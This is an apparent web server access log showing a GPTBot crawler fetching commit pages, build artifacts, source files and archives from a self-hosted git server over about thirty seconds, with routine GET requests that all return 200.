"https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 20856] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 20858] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 20841] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:15:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents" [Client 74.7.227.38] [Length 60420] [Gzip 8.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:15:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/branch/main" [Client 74.7.227.38] [Length 7467] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:15:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:15:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" -[17/Feb/2026:15:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14252] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:15:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12769] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" -[17/Feb/2026:15:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibmodbus-5.dll" [Client 74.7.227.38] [Length 23781] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:15:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher" [Client 74.7.227.38] [Length 36307] [Gzip 6.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" -[17/Feb/2026:15:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog_final.py" [Client 74.7.227.38] [Length 42409] [Gzip 9.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:15:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fdatabase.sqlite" [Client 74.7.227.38] [Length 20963] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" -[17/Feb/2026:15:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2fdatabase.sqlite" [Client 74.7.227.38] [Length 18357] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" -[17/Feb/2026:15:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:15:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json?display=source" [Client 74.7.227.38] [Length 11688] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" -[17/Feb/2026:15:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=Roff&q=&sort=recentupdate&tab=repositories" [Client 74.7.227.38] [Length 7791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:15:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main" [Client 74.7.227.38] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/branches" -[17/Feb/2026:15:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main" [Client 74.7.227.38] [Length 14564] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/branches" -[17/Feb/2026:15:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 20851] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:15:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:15:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 7807] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" -[17/Feb/2026:15:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10940] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" -[17/Feb/2026:15:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 11267] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:15:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?state=closed&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:15:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" -[17/Feb/2026:15:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" -[17/Feb/2026:15:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" -[17/Feb/2026:15:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13629] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?files=.TemporaryDocument" [Client 74.7.227.38] [Length 17017] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:15:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 7789] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" -[17/Feb/2026:15:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2findex.html.good2" [Client 74.7.227.38] [Length 22130] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" -[17/Feb/2026:15:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog_final.spec" [Client 74.7.227.38] [Length 21779] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:15:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 515] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:15:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 10260] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:15:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:15:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12223] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:15:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12254] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:15:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main" [Client 74.7.227.38] [Length 17180] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/branches" -[17/Feb/2026:15:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main" [Client 74.7.227.38] [Length 5773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/branches" -[17/Feb/2026:15:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10263] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 